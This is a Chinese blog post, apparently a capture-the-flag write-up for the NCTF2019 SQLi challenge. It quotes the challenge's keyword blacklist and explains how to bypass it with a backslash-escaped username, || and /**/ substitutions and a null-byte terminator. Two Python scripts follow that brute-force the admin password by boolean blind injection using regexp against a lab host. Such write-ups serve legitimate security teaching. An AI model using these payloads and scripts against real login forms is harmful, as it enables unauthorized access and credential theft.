[NCTF2019]SQLi regexp 盲注

双层小牛堡

于 2023-10-09 20:47:32 发布

阅读量6.7k

点赞数 2

分类专栏： BUUctf SQL注入文章标签： php

本文链接：https://blog.csdn.net/m0_64180167/article/details/133714167

版权

BUUctf 同时被 2 个专栏收录

58 篇文章 0 订阅

订阅专栏

SQL注入

16 篇文章 0 订阅

订阅专栏

本文描述了一次通过SQL注入技巧，尤其是布尔注入和正则表达式，成功绕过网站过滤机制，获取welcome.php页面中隐藏信息的过程。作者逐步演示了如何构造payload和处理字符限制，最终爆出了you_will_never_know7788990的值。

摘要由CSDN通过智能技术生成

/robots.txt

访问一下

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

这里实现了过滤

说需要admin的密码

这里我们可以发现没有过滤 \ 所以username 我们可以通过 \ 来绕过

所以我们通过passwd注入

or 使用 || 代替

然后空格使用 /**/代替

我们尝试登入

发现进行302跳转但是没办法

所以还是要通过查询admin passwd 进入

所以我们开始

写注入的代码这里很多都被过滤了

但是放出了 ^和 regexp

正则

我们可以通过正则来读取

和下面的例子一样

select (select 'b') > (select 'abc')  这个时候会返回0


select name regexp "^a"     这里的name是admin   //我自己的数据库

返回的是1

所以我们可以通过布尔注入实现这道题的读取

import time
from urllib import parse

import requests
import string

baseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"

paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'

def add(flag):
    res=''
    res += flag
    return  res
flag=''
ascii_chars = string.ascii_letters + string.digits + string.punctuation
print(ascii_chars)
for i in range(20):
    for j in ascii_chars:
        data = add(flag+j)
        paylaod1 = paylaod.format(data,parse.unquote('%00'))
        print(paylaod1)
        data={'username':'\\',
              'passwd':paylaod1}
        re=requests.post(url=baseurl,data=data)
        if re.status_code == 429:
            time.sleep(0.5)
        if "welcome.php" in re.text:
            flag += j
            print(flag)
            break

这里很坑上面的字符*的时候会循环输出

you*u*u*u

不知道是环境问题还是什么

所以我们现在替换

import time
from urllib import parse

import requests
import string

baseurl="http://271f8427-5e33-4411-aae5-90e418285c4f.node4.buuoj.cn:81/"

paylaod = '||/**/passwd/**/regexp/**/"^{}";{}'

def add(flag):
    res=''
    res += flag
    return  res
flag=''
ascii_chars = string.ascii_letters+string.digits+"_"
for i in range(20):
    for j in ascii_chars:
        data = add(flag+j)
        paylaod1 = paylaod.format(data,parse.unquote('%00'))
        data={'username':'\\',
              'passwd':paylaod1}
        re=requests.post(url=baseurl,data=data)
        if re.status_code == 429:
            time.sleep(0.5)
        if "welcome.php" in re.text:
            flag += j
            print(flag)
            break

这个就可以爆出值了

you_will_never_know7788990

双层小牛堡

关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[NCTF2019]SQLi regexp 盲注

这里我们可以发现没有过滤 \ 所以username 我们可以通过 \ 来绕过。这里很坑上面的字符*的时候会循环输出。所以还是要通过查询admin passwd 进入。所以我们可以通过布尔注入实现这道题的读取。写注入的代码这里很多都被过滤了。发现进行302跳转但是没办法。但是放出了 ^和 regexp。所以我们通过passwd注入。然后空格使用 /**/代替。不知道是环境问题还是什么。说需要admin的密码。or 使用 || 代替。我们可以通过正则来读取。
复制链接

扫一扫

专栏目录